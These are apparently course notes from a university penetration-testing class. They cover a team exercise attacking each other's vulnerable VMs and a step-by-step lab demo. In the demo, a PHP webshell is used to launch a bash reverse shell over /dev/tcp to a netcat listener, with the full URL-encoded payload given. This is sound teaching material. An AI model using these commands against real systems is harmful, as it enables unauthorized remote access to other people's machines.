Pen-Testing Comps Wednesday, 17 January 2024 + Sqli presentation + Discuss presentation strengths - show us the code - clear demo: normal behavior + bad behavior - multi-modal explanations - here's the code - here's what happens - here's an explanation of what happened - how to fix it and demo thereof + The plan for Monday and Wednesday - In your teams... - Create a Target VM - Give it a vulnerability that an attacker on the same network as your Target could find and exploit - Export your VM - Share it with somebody else on your team - See if they can run it and attack it from their host machine - Share the export in a way that I will describe later - Monday to Wednesday: attack a few of the other teams' machines + Kali installation on Apple Silicon + Topics for soon - General pen testing methodology - Reverse shells - Publicly available exploits and how to find them - ... ============= + The Demo of a Reverse Shell That Jeff Couldn't Get to Work Until 3 Minutes After Returning to his Office Step 0: set up your Target - I used Kali as my target, with Apache as my web server Step 1: put a webshell on the Target's website - Here's my webshell.php

Step 3: test the webshell from your Attacker (e.g., my Mac terminal or browser) http://IP_OF_KALI/webshell.php?command=whoami Step 4: launch a listener on your Attacker nc -lvnp 4444 Step 5: use the web shell to run this: bash -c "bash -i >& /dev/tcp/172.16.41.1/4444 0>&1" but note that ampersands are very special in URLs, so you need to "url-encode" them. Also, spaces in URLs cause trouble. So this needs to be: bash%20-c%20"bash%20-i%20>%26%20/dev/tcp/172.16.41.1/4444%200>%261" So, use this URL in either a browser or curl http://IP_OF_KALI/webshell.php?command=bash%20-c%20"bash%20-i%20>%26%20/dev/tcp/172.16.41.1/4444%200>%261" Step 6: look back at your nc listener; got a shell on the Target? LAST QUESTION: WTH is going on here? How does all this craziness work?